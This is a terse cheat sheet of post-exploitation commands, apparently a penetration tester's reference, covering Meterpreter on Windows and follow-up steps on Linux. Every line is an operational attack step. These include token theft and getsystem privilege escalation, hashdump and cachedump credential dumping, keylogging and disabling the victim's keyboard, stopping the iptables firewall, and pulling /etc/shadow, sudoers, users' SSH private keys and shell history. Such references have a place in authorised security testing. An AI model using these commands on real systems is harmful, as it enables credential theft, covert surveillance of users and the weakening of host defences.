Meterpreter Post-exploitation Modules
- use post/windows/gather/enum_logged_on_users
- Railgun - Meterpreter extension that allows direct access to Windows APIs
- IRB - Ruby shell in Meterpreter
Meterpreter Post Auth
- Info gathering
  - getuid
  - getpid
  - getprivs
  - sysinfo
  - screenshot
  - run winenum.rb
  - run scraper.rb
  - run checkvm
  - run credcollect
  - run get_local_subnets
- Priv Esc
  - ps then migrate
  - getsystem
  - Tokens
    - list_tokens -u
    - impersonate_token
    - steal_token [pid]
    - rev2self
- Retrieve passwords
  - hashdump
  - cachedump
  - post/windows/gather/smart_hashdump
  - post/windows/gather/credentials/vnc
- Session
  - enumdesktops
  - getdesktop
  - setdesktop
  - uictl disable keyboard
  - keylog
    - keyscan_start
    - keyscan_dump
    - keyscan_stop
Nix Post Auth
- Disable Firewall
  - /etc/init.d/iptables save
  - /etc/init.d/iptables stop
  - iptables-save > /root/firewall.rules
  - iptables-restore < /root/firewall.rules
- Files to pull
  - /etc/passwd
  - /etc/shadow OR /etc/security/shadow
  - /etc/group OR /etc/gshadow
  - /home/*/.ssh/id*
  - /etc/sudoers
- User Information
  - grep ^ssh /home/*/.*hist*
  - grep ^telnet /home/*/.*hist*
  - grep ^mysql /home/*/.*hist*